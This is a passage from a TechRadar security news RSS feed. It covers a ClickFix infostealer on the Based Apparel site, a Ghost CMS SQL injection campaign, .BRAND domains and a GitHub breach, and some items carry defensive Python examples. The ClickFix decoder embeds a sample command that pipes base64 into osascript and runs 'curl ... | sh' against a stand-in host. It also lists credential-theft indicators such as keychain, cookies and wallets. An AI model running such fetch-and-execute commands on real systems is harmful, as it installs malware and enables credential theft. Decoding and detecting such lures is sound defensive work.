src="https://cdn.mos.cms.futurecdn.net/vuyxrMovXEkAjxzafD682T.png" mos="" align="middle" fullscreen="" width="886" height="498" attribution="" endorsement="" class="inline"></p></div></div><figcaption itemprop="caption description" class=" inline-layout"><span class="credit" itemprop="copyrightHolder">(Image credit: NordVPN)</span></figcaption></figure><p>The rebranding of Threat Protection features as next-generation antivirus capabilities is especially significant for understanding how the company is adapting to an online landscape where threats have diversified.</p><p>Many of today's most common and damaging digital dangers, including phishing pages, fake online stores, scam messages, and account takeover attempts, do not rely on downloadable files at all. Instead, modern cybercriminals use deception, compromised credentials, and social engineering to target unsuspecting users.</p><p>Yet, as Briedis explains, people still use the word '<a href="https://www.techradar.com/best/best-antivirus">antivirus</a>' as a "shorthand" for digital security. "Modern protection should address the real risks people face online today, from phishing and scams to malicious downloads. Protection needs to evolve, without compromising the standard of privacy people expect from us," said Briedis.</p><p>Traditional <a href="https://www.techradar.com/best/best-antivirus">antivirus</a> software, in fact, has historically focused on reactive file scanning. NordVPN's next-generation antivirus aims to redefine this concept for private customers. 
It focuses on proactive, real-time protection to stop <a href="https://www.techradar.com/news/what-is-phishing-and-how-dangerous-is-it">phishing</a>, scams, ads, trackers, and malware before they ever reach a user's device.</p><p>Over the last year, we have tracked how <a href="https://www.techradar.com/vpn/vpn-services/beyond-vpn-protection-how-nordvpn-changed-in-2025-and-whats-in-store-for-2026">NordVPN has steadily integrated</a> broader defense features against online scams and malware. And these tools are already working hard. In April alone, NordVPN's next-gen antivirus tool blocked 4.8 million threats. <a href="https://www.techradar.com/news/what-is-malware-and-how-dangerous-is-it">Malware</a> made up the majority of these blocks, accounting for over 3 million stopped threats.</p><p>Now, those extra layers of defense are taking center stage. It is a massive evolution for a service that already ranks among the <a href="https://www.techradar.com/reviews/nordvpn">best VPN</a> options on the market.</p><h2 id="privacy-first-security-by-design">Privacy-first security by design</h2><p>One of the biggest concerns for users adopting all-in-one security suites is privacy. Antivirus software historically requires deep system access, which can raise surveillance concerns. </p><p>NordVPN claims its security approach is designed around collecting the minimum signal required to make a threat decision, avoiding turning security tools into surveillance products.</p><p>This privacy-first ethos extends across NordVPN's entire suite, from its core VPN capabilities to its dedicated machine learning models used to catch specific threat categories.</p><p>For users looking to streamline their digital setup, this rebrand also seeks to reduce the clutter of managing multiple subscription services. </p><p>"Consumers should not have to choose between convenience, protection, and privacy," says Briedis. 
"Our goal is to bring together advanced VPN technology and next-generation antivirus in one streamlined app experience that reduces complexity and better matches how people think about digital safety today."</p><p>This rebrand follows what has already been a highly active period for the provider; you can catch up on their other recent updates in our recap of <a href="https://www.techradar.com/vpn/vpn-services/nordvpn-had-a-busy-start-to-2026-heres-a-recap-of-all-the-releases-you-may-have-missed">everything NordVPN released in early 2026</a>.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kash Patel's 'BasedApparel' website is apparently hosting ClickFix malware ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/kash-patels-basedapparel-website-is-apparently-hosting-clickfix-malware</link>
                                                                            <description>
                            <![CDATA[ The malware targets macOS users only and serves commodity infostealers. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">Ma45DfZaZxyu4sjyukVJDN</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/A33uiNMYWME9b9zkSfwQjD-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 26 May 2026 18:20:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/A33uiNMYWME9b9zkSfwQjD-1280-80.jpg">
                                                            <media:credit><![CDATA[Future]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Based Apparel]]></media:description>                                                            <media:text><![CDATA[Based Apparel]]></media:text>
                                <media:title type="plain"><![CDATA[Based Apparel]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/A33uiNMYWME9b9zkSfwQjD-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>Researcher finds Based Apparel site serving a macOS ClickFix infostealer disguised as a Cloudflare CAPTCHA check</strong></li><li><strong>Victims were tricked into pasting malicious Applescript commands in Terminal, with VirusTotal flagging the malware as a commodity Trojan/infostealer</strong></li><li><strong>The site, built on WordPress/WooCommerce and Ghost CMS, was taken offline after disclosure, linking the incident to broader Ghost CMS exploitation in ongoing ClickFix campaigns</strong></li></ul><p>Based Apparel, an American online clothing company selling patriotic, conservative, and pro–free speech-themed merchandise, was seemingly compromised and used to serve malware through the ClickFix technique - but only macOS users were targeted.</p><p>A researcher with the alias ‘debbie’ disclosed her findings to <a href="https://uk.pcmag.com/security/165117/kash-patels-apparel-site-is-trying-to-trick-visitors-into-installing-malware" target="_blank"><em>PC Mag</em></a>, before sharing video proof on X, after saying she read online about Based Apparel being co-founded by FBI Director Kash Patel and decided to take a closer look.</p><p>“The ClickFix attack just kinda popped up when I was browsing it,” Debbie said in an email. “I took a quick look and it's just a classic infostealer, wrapped twice in base64 (binary-to-text encoding). It's interesting that it's written in Applescript though.”</p><h2 id="links-to-ghost-cms">Links to Ghost CMS?</h2><p>The victims were asked to verify they were human on a CAPTCHA page seemingly coming from Cloudflare. This spoofed Cloudflare page tells the victim that “unusual web traffic” was detected, and asks the victim to confirm they’re human by opening the Terminal and pasting a command shared on the page. 
</p><p>Running the infostealer through VirusTotal, <em>PC Mag</em> found it was flagged by 27 antivirus engines as a Trojan and infostealer, meaning it’s commodity <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> rather than a custom-built solution for targeted attacks. </p><p>Based Apparel is yet to comment, but its website is offline for the time being. At press time, the site showed a “We’ll be right back” message that stated the company is “making improvements”.</p><p>The website is seemingly built using two content management systems - WordPress with WooCommerce for the store functionality, and Ghost CMS for the separate news subdomain.</p><p>Earlier today, we reported that <a href="https://www.techradar.com/pro/security/ghost-cms-flaw-hijacked-to-target-hundreds-of-websites-with-clickfix-attacks-heres-how-to-stay-safe">a critical-severity vulnerability in Ghost CMS</a>, patched in February 2026, was also being abused against more than 700 domains to launch ClickFix attacks. </p>
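<p>The command the lure asks the victim to paste is a base64 blob piped through decoders into an interpreter, so the quickest triage step is to unwrap the layers offline and read what would actually run. The Python helper below is an added example written for this page, not code from the researcher, <em>PC Mag</em> or any vendor: it pulls base64 tokens out of a pasted one-liner, peels nested layers until plain text appears, and flags hits from a hypothetical list of AppleScript and macOS indicators. The sample command is constructed: a harmless AppleScript wrapped twice in base64 and piped to osascript, in the shape the article describes. The indicator list and the example.invalid URL are assumptions.</p>

```python
"""Triage helper for a ClickFix-style Terminal one-liner (added example, not code from the article)."""
import base64
import binascii
import re
from typing import Optional

# Strings worth flagging in a recovered script. Illustrative assumption for this
# example, not a detection rule from PC Mag, VirusTotal or any vendor.
INDICATORS = (
    "osascript", "do shell script", "curl ", "keychain", "Library/Application Support",
    "Cookies", "Login Data", "wallet", "chflags hidden", "launchctl",
)

# A run of base64 alphabet long enough to be a payload rather than an ordinary word.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
INTERPRETER = re.compile(r"\b(osascript|bash|sh|zsh|python3?)\b")


def _try_b64_decode(data: bytes) -> Optional[bytes]:
    """Strict base64 decode; None if the data is not base64 or does not decode to UTF-8 text."""
    try:
        out = base64.b64decode(data, validate=True)
        out.decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    return out


def unwrap_layers(blob: str, max_layers: int = 8) -> tuple:
    """Peel nested base64 layers until the content no longer decodes as base64.

    Returns (plaintext, layers_removed). The bound on layers guards against a blob
    whose decoded form happens to look like base64 again and again.
    """
    current = blob.strip().encode()
    layers = 0
    while layers < max_layers:
        decoded = _try_b64_decode(current)
        if decoded is None:
            break
        current = decoded.strip()
        layers += 1
    return current.decode("utf-8", errors="replace"), layers


def triage(command: str) -> dict:
    """Decode every embedded blob in a pasted command and report indicator hits."""
    findings = []
    for blob in B64_TOKEN.findall(command):
        script, layers = unwrap_layers(blob)
        if layers == 0:
            continue                      # plain token, not an encoded payload
        lowered = script.lower()
        hits = sorted(i for i in INDICATORS if i.lower() in lowered)
        findings.append({"layers": layers, "script": script, "hits": hits})
    return {
        "pipes_to_interpreter": bool(INTERPRETER.search(command)),
        "findings": findings,
    }


# Constructed, harmless stand-in for the lure: an AppleScript wrapped twice in base64
# and piped to osascript, the way the fake CAPTCHA page tells the victim to do.
SAMPLE_SCRIPT = (
    'do shell script "curl -s https://example.invalid/stage2 | sh"\n'
    'display dialog "Verification complete"'
)
_inner = base64.b64encode(SAMPLE_SCRIPT.encode()).decode()
_outer = base64.b64encode(_inner.encode()).decode()
SAMPLE_COMMAND = f"echo {_outer} | base64 -d | base64 -d | osascript"

if __name__ == "__main__":
    report = triage(SAMPLE_COMMAND)
    print("pipes to interpreter:", report["pipes_to_interpreter"])
    for finding in report["findings"]:
        print(f"{finding['layers']} base64 layer(s); hits: {finding['hits']}")
        print(finding["script"])
```

<p>Paste the suspicious command in as a string rather than running it; the helper never executes anything. The double wrapping defeats a casual glance at the page source but not a decoder loop, which is the point of unwrapping it yourself before deciding what the lure was after.</p>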
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ghost CMS flaw hijacked to target hundreds of websites with ClickFix attacks — here's how to stay safe ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/ghost-cms-flaw-hijacked-to-target-hundreds-of-websites-with-clickfix-attacks-heres-how-to-stay-safe</link>
                                                                            <description>
                            <![CDATA[ A critical-level flaw in a popular CMS, patched months ago, is now being abused. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">sTs68yar6vmTMgbXLQu4aS</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/HU8VZ2jkrVAHBpb3Aqqg8j-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 26 May 2026 13:05:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/HU8VZ2jkrVAHBpb3Aqqg8j-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images/Tatiana Maksimova]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Female hands typing on a laptop in neon light. A lock as a symbol of cybersecurity on a foreground.]]></media:description>                                                            <media:text><![CDATA[Female hands typing on a laptop in neon light. A lock as a symbol of cybersecurity on a foreground.]]></media:text>
                                <media:title type="plain"><![CDATA[Female hands typing on a laptop in neon light. A lock as a symbol of cybersecurity on a foreground.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/HU8VZ2jkrVAHBpb3Aqqg8j-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>Researchers warn CVE-2026-26980, a critical SQL injection flaw in Ghost CMS (severity score 9.4), is being exploited in a large ClickFix campaign</strong></li><li><strong>Over 700 domains, including Harvard, Oxford, DuckDuckGo, and major AI/SaaS firms, were compromised to deliver malware via DLL loaders, JS droppers, and Electron-based payloads</strong></li><li><strong>Admins should urgently upgrade to Ghost 6.19.1 or later and review 30 days of Admin API logs to detect potential compromise</strong></li></ul><p>A critical-severity vulnerability that was reportedly patched three months ago is being exploited in a massive ClickFix campaign, researchers have claimed.</p><p>In mid-February 2026, a critical SQL injection vulnerability was found in Ghost CMS, a popular open-source content management system (<a href="https://www.techradar.com/best/cms">CMS</a>) currently used by more than 57,000 websites, including the likes of 404 Media, the Canadian government, and Duolingo.</p><p>The flaw, tracked as CVE-2026-26980 and affecting Ghost 3.24.0 through 6.19.0, was assigned a severity score of 9.4/10 (critical) because it can allow unauthenticated attackers to perform arbitrary reads from the database, exposing data on users, posts, pages and themes. </p><h2 id="deploying-various-malware">Deploying various malware</h2><p>Many site owners evidently did not patch: Chinese cybersecurity firm Qianxin claims more than 700 domains were compromised to serve ClickFix attack flows. </p><p>Among them are Harvard University, Oxford University, Auburn University, DuckDuckGo, and many AI/SaaS company sites, media outlets, fintech firms, and others. </p><p>ClickFix is a type of scam in which attackers tell victims they have a problem (which they don’t) and then offer a solution (which it isn’t), typically a command the victim is told to copy and paste into a terminal. 
The “solution” simply deploys a piece of <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a>, and depending on the attackers and the targets, it can be anything from a classic backdoor to a ransomware encryptor. </p><p>In this campaign, the researchers saw DLL loaders, JavaScript droppers, and Electron-based malware being distributed. </p><p>The fix is to upgrade Ghost to version 6.19.1 or, better, to whatever the latest release is. Patching closes the hole but does not undo a prior compromise, so site owners are also advised to retain at least 30 days of Admin API request logs and review them for signs of attacker access.</p><p><em>Via </em><a href="https://www.bleepingcomputer.com/news/security/ghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign/" target="_blank"><em>BleepingComputer</em></a></p>
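<p>Because the affected range and the fix version are stated precisely, the first thing a site owner wants is a reliable answer to "which Ghost am I running, and is it in range?". The Python below is an added example for this page, not Ghost's code or Qianxin's: it reads the version from the generator meta tag in a rendered page (assumed here to carry only major.minor, as Ghost's generator tag typically does) or from the Admin API site document (assumed to be the unauthenticated <code>/ghost/api/admin/site/</code> endpoint returning the full version), and classifies it against 3.24.0 through 6.19.0, refusing to guess when a bare "6.19" could be on either side of the fix. The HTML and JSON inputs are constructed, not captured from a real site.</p>

```python
"""Check a Ghost site's advertised version against the CVE-2026-26980 affected range (added example)."""
import json
import re
from typing import Optional

# Range and fix as stated in the article; the check is only as good as these constants.
AFFECTED_MIN = (3, 24, 0)
AFFECTED_MAX = (6, 19, 0)
FIXED = (6, 19, 1)

# Rendered Ghost pages carry <meta name="generator" content="Ghost X.Y"> (assumed major.minor only).
GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="Ghost\s+([0-9.]+)"', re.I)


def parse_version(text: str):
    """Turn '6.19' or '6.19.1' into a 3-tuple and report whether the patch level was present."""
    parts = [int(p) for p in text.strip().split(".") if p.isdigit()]
    if not 2 <= len(parts) <= 3:
        raise ValueError(f"unrecognised version string: {text!r}")
    has_patch = len(parts) == 3
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts), has_patch


def version_from_html(html: str) -> Optional[str]:
    """Version string from the generator meta tag, or None if the page does not look like Ghost."""
    m = GENERATOR_RE.search(html)
    return m.group(1) if m else None


def version_from_site_json(body: str) -> Optional[str]:
    """Version from the Admin API site document.

    Assumption for this example: GET /ghost/api/admin/site/ answers without
    authentication and returns {"site": {"version": "<full version>", ...}}.
    """
    try:
        return json.loads(body)["site"]["version"]
    except (ValueError, KeyError, TypeError):
        return None


def assess(version_text: str) -> dict:
    """Classify a version as vulnerable, outside the range, or undecidable from major.minor alone."""
    version, has_patch = parse_version(version_text)
    in_range = AFFECTED_MIN <= version <= AFFECTED_MAX
    if in_range and not has_patch and version[:2] == FIXED[:2]:
        # "Ghost 6.19" could be 6.19.0 (vulnerable) or 6.19.1+ (fixed); the meta tag
        # cannot tell them apart, so confirm with a source that reports the patch level.
        verdict = "undecidable: 6.19.x needs the patch level to classify"
    elif in_range:
        verdict = "vulnerable"
    else:
        verdict = "outside affected range"
    return {"version": version, "has_patch": has_patch, "verdict": verdict}


# Constructed inputs: a page from an unpatched 5.x site and a site document from a
# 6.19.1 install. Neither is captured from a real server.
SAMPLE_HTML = '<html><head><meta name="generator" content="Ghost 5.118"></head><body></body></html>'
SAMPLE_SITE_JSON = '{"site": {"title": "Example blog", "version": "6.19.1", "url": "https://blog.example"}}'

if __name__ == "__main__":
    for label, text in (("meta tag", version_from_html(SAMPLE_HTML)),
                        ("admin site API", version_from_site_json(SAMPLE_SITE_JSON))):
        print(label, text, assess(text)["verdict"])
```

<p>To use it against a live site, fetch the home page and the site endpoint yourself and pass the bodies in; the script deliberately does no network I/O. A clean version report is not proof that a site was never exploited: anything compromised before the upgrade still needs its Admin API logs reviewed, as the article advises.</p>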
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ How .BRANDs improve domain security and user trust – even in an AI world ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/how-brands-improve-domain-security-and-user-trust-even-in-an-ai-world</link>
                                                                            <description>
                            <![CDATA[ .BRAND gTLDs bolster domain security against phishing, fraud and other AI-generated threats. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">sB85T8pTjLjtewXgTGzo8W</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/UjSNcAZ5SebctebKAMQNVF-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 26 May 2026 10:22:32 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Gretchen Olive ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/UjSNcAZ5SebctebKAMQNVF-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Cybersecurity ensures data protection on internet. Data encryption, firewall, encrypted network, VPN, secure access and authentication defend against malware, hacking, cyber crime and digital threat]]></media:description>                                                            <media:text><![CDATA[Cybersecurity ensures data protection on internet. Data encryption, firewall, encrypted network, VPN, secure access and authentication defend against malware, hacking, cyber crime and digital threat]]></media:text>
                                <media:title type="plain"><![CDATA[Cybersecurity ensures data protection on internet. Data encryption, firewall, encrypted network, VPN, secure access and authentication defend against malware, hacking, cyber crime and digital threat]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/UjSNcAZ5SebctebKAMQNVF-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<p>At the end of April, the Internet Corporation for Assigned Names and Numbers (ICANN) opened its application window for new generic top-level <a href="https://www.techradar.com/news/best-domain-registrars">domains</a> (gTLDs) for the first time since 2012, allowing organizations to apply for a .BRAND gTLD that matches their trademarked name.</p><p>“Top level” refers to what is typically the “.com,” “.net,” “.gov,” etc. part of a domain. A .BRAND instead features a brand name after the final dot in a domain address, such as https://about.google. </p><p>As a custom domain extension, it is owned and operated by the <a href="https://www.techradar.com/best/best-business-plan-software">business</a> that holds the trademarked name. </p><p>With this, companies take full control of their domain ecosystem, creating, managing and retiring domains quickly without third-party assistance.</p><p>This means .BRANDs are about much more than a name. The current application period is a fresh opportunity to future-proof digital assets by carving out a trusted space for company information and partner interactions. Such trust is needed because emerging <a href="https://www.techradar.com/best/best-ai-tools">AI tools</a> are enabling increasingly sophisticated cyberattacks and brand infringements that target domains. </p><p>Nine out of ten organizations have experienced at least one domain name system (DNS) attack, at an average cost of $1.1 million per incident. Executive leaders must reassess how best to prepare their internal, partner and customer infrastructures for this new era of digital threats.</p><h2 id="the-great-promise-of-dot-brands">The great promise of dot BRANDS</h2><p>Dot BRANDs hold great promise in helping companies achieve this. 
They bolster domain <a href="https://www.techradar.com/news/best-internet-security-suites">security</a> against phishing and other types of fraud by removing the room for lookalike domains within the brand's own namespace. At the same time, they boost brand visibility and placement in search results and AI-generated responses alike.  </p><p>There are more than 400 .BRANDs in operation, including dns.google, home.barclays and group.softbank. To cite one example, Microsoft is consolidating Microsoft 365 apps and services under the cloud.microsoft domain. Businesses that follow suit gain the following protections:</p><ol><li>ICANN Specification 13 ensures that a .BRAND gTLD is reserved exclusively for the trademark holder, eliminating third-party registrations under it. </li><li>An official .BRAND enables full traceability and consistency for every site under it, assuring the authenticity of any hosted <a href="https://www.techradar.com/web-hosting/best-web-hosting-service-websites">website</a> that lives there.</li><li>By operating in this exclusive namespace, organizations reduce exposure to lookalike domains commonly used in phishing, <a href="https://www.techradar.com/best/best-malware-removal">malware</a> and impersonation schemes. The protection covers names under the .BRAND itself; attackers can still register lookalikes under other TLDs, so the benefit is realised only when users and systems actually check the final label. Even so, a .BRAND narrows the attack surface and limits financial and reputational risk.</li><li>Users can distinguish fraudulent domains from real ones because a .BRAND establishes clear authenticity and a company-controlled online space, and with it customer trust. 
Conversely, anything hosted outside the .BRAND cannot be traced to the organization and can be treated as not the brand's.</li></ol><h2 id="fueling-reliable-ai-llm-results">Fueling reliable AI/LLM results</h2><p>This means businesses can say with confidence, “If it doesn’t end in our .BRAND domain, then it’s not us.” That confidence carries over to the now ubiquitous AI/large language models (<a href="https://www.techradar.com/computing/artificial-intelligence/best-llms">LLMs</a>) in several ways. </p><p>For starters, .BRANDs create a future-ready, controlled TLD infrastructure with a secure foundation for emerging technologies like AI and LLMs. Because the brand exclusively owns and operates the TLD, every domain published under it carries an unambiguous signal of origin that AI systems can use when crawling and sourcing content.</p><p>An organization’s domain ecosystem plays a major role in whether AI tools will use its content as a source. In gathering information to generate responses, LLMs and AI search engines increasingly rely on digital signals that are verified and contain reliable content, not those that appear fraudulent or contain inaccurate information. The ability to identify legitimate sources is crucial here, especially given the wealth of AI-generated misinformation online.</p><p>Content hosted on a .BRAND website is, by construction, published by the trademark holder, so it is as verifiable and authentic as the organization's own infrastructure is secure. Beyond security, this establishes a strong signal for AI search results and response rankings, with .BRANDs emerging as machine-readable trust signals.</p><h2 id="seizing-a-rare-domain-opportunity">Seizing a rare domain opportunity</h2><p>A .BRAND is not a short-term marketing initiative; it is a long-term strategic position. 
It is distinctive, secure and easily identifiable as authentic by both humans and machines, delivering a decided competitive advantage in the AI race. A .BRAND also signals that your company is a market leader focused on innovation, with a lasting commitment to domain defense, brand control and digital strategy.</p><p>That said, pursuing a .BRAND is a significant undertaking. Applicants must hold a registered trademark for the desired extension, and the costs are considerable. .BRANDs are most viable for larger organizations with legally defensible brand names and the resources to transition to and maintain a TLD over the long term. For those that qualify, however, the investment secures a level of digital ownership that no other domain strategy can match.</p><p>It has been 14 years since the last application window opened, and there may not be another in the foreseeable future once the current one closes on August 12 this year. Executive leaders should therefore seize the moment to assess whether now is the time to take greater control of their brand’s digital identity, and to position their organization as forward-thinking and authoritative.</p><p><a href="https://www.techradar.com/news/the-best-website-builder"><em>We feature the best website builders</em></a><em>.</em></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
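<p>The rule “if it doesn’t end in our .BRAND domain, it’s not us” only pays off if it is applied consistently, and the cases that fool a human (mixed case, a trailing dot, userinfo before an @, the brand name used as a subdomain of an attacker's host, or a non-Latin lookalike letter) are exactly where automation helps, for instance in a mail gateway or link checker. The Python below is an added example for this page, not code from ICANN, any registry or any of the brands named above: it normalises a URL's host and checks that its final label is one of the organization's own gTLDs. The allow-list of brand TLDs is a constructed example.</p>

```python
"""Enforce "if it doesn't end in our .BRAND, it's not us" on URLs (added example, not a registry's code)."""
from urllib.parse import urlsplit


def brand_tld_of(url: str) -> str:
    """Final DNS label of the URL's host in ASCII (IDNA) form, or '' if there is no usable host.

    Handles what a quick visual check gets wrong: upper case, a trailing dot, a port,
    userinfo before an @, and non-ASCII lookalike characters (which become xn-- labels).
    """
    if "://" not in url:
        url = "https://" + url            # accept bare hostnames too
    host = urlsplit(url).hostname         # lowercased, without port or userinfo
    if not host:
        return ""
    host = host.rstrip(".")
    try:
        ascii_host = host.encode("idna").decode("ascii")
    except UnicodeError:
        return ""                         # not a valid DNS name at all
    return ascii_host.rsplit(".", 1)[-1]


def url_belongs_to_brand(url: str, brand_tlds) -> bool:
    """True only when the host's top-level label is one of the organization's own gTLDs."""
    tld = brand_tld_of(url)
    return bool(tld) and tld in brand_tlds


# Constructed allow-list for the example; a real deployment would load the
# organization's own delegated .BRAND TLD(s).
BRAND_TLDS = frozenset({"barclays", "google"})

if __name__ == "__main__":
    for candidate in (
        "https://home.barclays/",
        "https://home.barclays.evil.example/",     # brand used as a subdomain of another host
        "https://home.barclays@evil.example/",     # brand hidden in userinfo
        "https://home-barclays.com/",              # hyphenated lookalike under .com
        "https://home.b\u0430rclays/",             # Cyrillic a in place of Latin a
    ):
        print(f"{candidate:45} -> {url_belongs_to_brand(candidate, BRAND_TLDS)}")
```

<p>The check inspects only the final label, which is the whole point of a .BRAND: no amount of prefixing, hyphenation or lookalike lettering elsewhere in the name can make it pass. It says nothing about whether the content behind a passing URL is safe; that remains the organization's responsibility.</p>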
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ GitHub confirms breach — thousands of internal repositories hit after employee installs malicious VS Code extension ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/github-confirms-breach-thousands-of-internal-repositories-hit-after-employee-installs-malicious-vs-code-extension</link>
                                                                            <description>
                            <![CDATA[ TeamPCP continues its attack on open source projects, now apparently asking for $50,000. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">C22m7CB6ZxaQKTfiyrXJ57</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/2viAsX89eJReYQEQ3i3SwH-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 21 May 2026 13:20:00 +0000</pubDate>                                                                                                                                <updated>Fri, 22 May 2026 08:18:11 +0000</updated>
                                                                                                                                            <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/2viAsX89eJReYQEQ3i3SwH-1280-80.jpg">
                                                            <media:credit><![CDATA[Gil C / Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[GitHub Webpage]]></media:description>                                                            <media:text><![CDATA[GitHub Webpage]]></media:text>
                                <media:title type="plain"><![CDATA[GitHub Webpage]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/2viAsX89eJReYQEQ3i3SwH-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>GitHub confirms an employee’s compromised device led to exfiltration of internal repositories via a malicious VS Code extension</strong></li><li><strong>Threat actors TeamPCP are selling an archive of roughly 4,000 repos on the dark web, asking $50,000 and sharing samples as proof</strong></li><li><strong>The group is also behind recent npm supply-chain attacks, highlighting its ongoing campaign against developer ecosystems</strong></li></ul><p>GitHub, the code hosting platform behind much of the world’s <a href="https://www.techradar.com/best/best-open-source-software">open source</a> software, has confirmed a cyberattack in which sensitive internal data was stolen. </p><p>In a short announcement on <a href="https://x.com/github/status/2056884788179726685" target="_blank" rel="nofollow">X</a>, GitHub said one of its employees had their device compromised after installing a malicious VS Code extension. Editor extensions run with the full privileges of the user who installs them, so a poisoned one has the same reach as any other malware on the endpoint.</p><p>The company removed the <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a>, isolated the endpoint, and started an investigation, which determined that the attacker had exfiltrated some sensitive data.</p><h2 id="teampcp-takes-the-blame">TeamPCP takes the blame</h2><p>“Our current assessment is that the activity involved exfiltration of GitHub-internal repositories only,” GitHub noted. “The attacker’s current claims of ~3,800 repositories are directionally consistent with our investigation so far.”</p><p>In response, GitHub rotated critical secrets and continues to analyze logs, validate the secret rotation, and monitor for follow-on activity. “We will take additional action as the investigation warrants,” it concluded. 
</p><p>An archive of roughly 4,000 repositories is reportedly being offered for sale on the dark web by threat actors known as TeamPCP. <a href="https://cyberinsider.com/github-confirms-internal-repository-theft-as-teampcp-claims-attack/"><em>CyberInsider</em></a> reports the group is asking $50,000 for the archive; no ransom note was apparently left. </p><p>“There is a total of around ~4,000 repos of private code here,” the crooks allegedly said. They also shared samples to prove the authenticity of their claims, and said that if no one buys the stash soon they would leak it on the dark web for free. </p><p>Alongside ShinyHunters, TeamPCP is currently one of the most active groups around. It is responsible for the <a href="https://www.techradar.com/pro/security/mini-shai-halud-hackers-publish-over-600-compromised-npm-packages-developers-warned-to-be-on-their-guard" target="_blank">Shai-Hulud</a> and Mini Shai-Hulud campaigns, in which it compromised large numbers of GitHub and npm accounts and used them to push malware to potentially thousands of projects.</p><p>It recently published more than 600 malicious package versions to the npm registry, across more than 300 distinct packages. With stolen login credentials and access tokens, the attackers take over legitimate packages and publish updates carrying infostealer malware that harvests further credentials and compromises CI/CD environments, which in turn feeds the next round of takeovers.</p>
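<p>The npm side of TeamPCP's activity works because npm runs a package's install-time lifecycle scripts automatically, so a hijacked release executes code on every developer machine and CI runner that installs it. The Python below is an added example written for this page, not GitHub's, npm's or any vendor's tooling: it walks a <code>node_modules</code> tree, lists every preinstall/install/postinstall/prepare hook, and flags commands that download, decode or evaluate code or touch credential files. The sample manifests (both package names are invented) and the risky-pattern list are constructed assumptions for the example.</p>

```python
"""Audit installed npm packages for risky install-time lifecycle scripts (added example, not npm's code)."""
import json
import os
import re
from typing import Iterable, Iterator

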